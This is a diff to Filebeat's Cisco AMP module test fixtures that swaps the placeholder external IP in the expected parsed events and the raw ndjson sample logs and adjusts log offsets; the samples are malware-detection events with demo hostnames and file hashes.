-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1049,7 +1049,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 21191,
+        "log.offset": 21271,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1060,7 +1060,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1072,7 +1072,7 @@
         "@timestamp": "2021-01-15T10:17:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1110,7 +1110,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 22515,
+        "log.offset": 22600,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1121,7 +1121,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1133,7 +1133,7 @@
         "@timestamp": "2021-01-15T10:17:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1173,7 +1173,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 23834,
+        "log.offset": 23924,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1184,7 +1184,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1196,7 +1196,7 @@
         "@timestamp": "2021-01-15T10:17:37.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1236,7 +1236,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 25159,
+        "log.offset": 25254,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1247,7 +1247,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1259,7 +1259,7 @@
         "@timestamp": "2021-01-15T10:17:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1299,7 +1299,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 26489,
+        "log.offset": 26589,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1310,7 +1310,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1322,7 +1322,7 @@
         "@timestamp": "2021-01-15T10:17:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1363,7 +1363,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 27769,
+        "log.offset": 27874,
         "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729",
         "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
         "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1379,7 +1379,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1395,7 +1395,7 @@
         "@timestamp": "2021-01-15T10:17:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1435,7 +1435,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 29385,
+        "log.offset": 29495,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1446,7 +1446,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1458,7 +1458,7 @@
         "@timestamp": "2021-01-15T10:17:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1499,7 +1499,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 30665,
+        "log.offset": 30780,
         "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729",
         "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb",
         "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1515,7 +1515,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1531,7 +1531,7 @@
         "@timestamp": "2021-01-15T10:17:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1571,7 +1571,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 32281,
+        "log.offset": 32401,
         "related.hash": [
             "209a288c68207d57e0ce6e60ebf60729",
             "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370",
@@ -1582,7 +1582,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1594,7 +1594,7 @@
         "@timestamp": "2021-01-15T10:17:36.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1635,7 +1635,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 33561,
+        "log.offset": 33686,
         "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e",
         "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
         "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
@@ -1651,7 +1651,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1667,7 +1667,7 @@
         "@timestamp": "2021-01-15T10:17:25.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1705,7 +1705,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 35128,
+        "log.offset": 35258,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1716,7 +1716,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1728,7 +1728,7 @@
         "@timestamp": "2021-01-15T10:17:21.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1769,7 +1769,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 36447,
+        "log.offset": 36582,
         "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e",
         "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9",
         "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad",
@@ -1785,7 +1785,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1801,7 +1801,7 @@
         "@timestamp": "2021-01-15T10:17:14.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1839,7 +1839,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 38014,
+        "log.offset": 38154,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1850,7 +1850,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1862,7 +1862,7 @@
         "@timestamp": "2021-01-15T10:17:02.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1900,7 +1900,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 39333,
+        "log.offset": 39478,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -1911,7 +1911,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1923,7 +1923,7 @@
         "@timestamp": "2021-01-15T10:14:55.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1963,7 +1963,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 40652,
+        "log.offset": 40802,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -1974,7 +1974,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1990,7 +1990,7 @@
         "@timestamp": "2021-01-15T10:14:55.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2028,7 +2028,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 41978,
+        "log.offset": 42133,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2039,7 +2039,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2055,7 +2055,7 @@
         "@timestamp": "2021-01-15T10:14:55.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2095,7 +2095,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 43297,
+        "log.offset": 43457,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2106,7 +2106,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2122,7 +2122,7 @@
         "@timestamp": "2021-01-15T10:13:54.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2162,7 +2162,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 44622,
+        "log.offset": 44787,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2173,7 +2173,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2189,7 +2189,7 @@
         "@timestamp": "2021-01-15T10:13:54.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2227,7 +2227,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 45948,
+        "log.offset": 46118,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2238,7 +2238,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2254,7 +2254,7 @@
         "@timestamp": "2021-01-15T10:13:54.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2294,7 +2294,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 47266,
+        "log.offset": 47441,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2305,7 +2305,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2321,7 +2321,7 @@
         "@timestamp": "2021-01-15T10:13:53.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2359,7 +2359,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 48591,
+        "log.offset": 48771,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2370,7 +2370,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2382,7 +2382,7 @@
         "@timestamp": "2021-01-15T10:13:53.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2420,7 +2420,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 49910,
+        "log.offset": 50095,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2431,7 +2431,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2447,7 +2447,7 @@
         "@timestamp": "2021-01-15T10:13:41.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2485,7 +2485,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 51229,
+        "log.offset": 51419,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2496,7 +2496,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2508,7 +2508,7 @@
         "@timestamp": "2021-01-15T10:13:29.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2546,7 +2546,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 52548,
+        "log.offset": 52743,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2557,7 +2557,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2569,7 +2569,7 @@
         "@timestamp": "2021-01-15T10:13:17.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2607,7 +2607,7 @@
         "host.hostname": "Demo_Dyre",
         "host.name": "Demo_Dyre",
         "input.type": "log",
-        "log.offset": 53867,
+        "log.offset": 54067,
         "related.hash": [
             "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
             "e9d8c15e7d18678dd41771f72ed6693c",
@@ -2618,7 +2618,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2630,7 +2630,7 @@
         "@timestamp": "2021-01-15T10:12:53.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2670,7 +2670,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 55186,
+        "log.offset": 55391,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2681,7 +2681,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2697,7 +2697,7 @@
         "@timestamp": "2021-01-15T10:12:53.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2735,7 +2735,7 @@
         "host.hostname": "Demo_AMP_Threat_Audit",
         "host.name": "Demo_AMP_Threat_Audit",
         "input.type": "log",
-        "log.offset": 56512,
+        "log.offset": 56722,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2746,7 +2746,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2762,7 +2762,7 @@
         "@timestamp": "2021-01-15T10:12:53.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2802,7 +2802,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 57830,
+        "log.offset": 58045,
         "related.hash": [
             "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
             "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
@@ -2813,7 +2813,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log
index f31bf18a23a1..b643caa475b8 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log
@@ -1,100 +1,100 @@
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
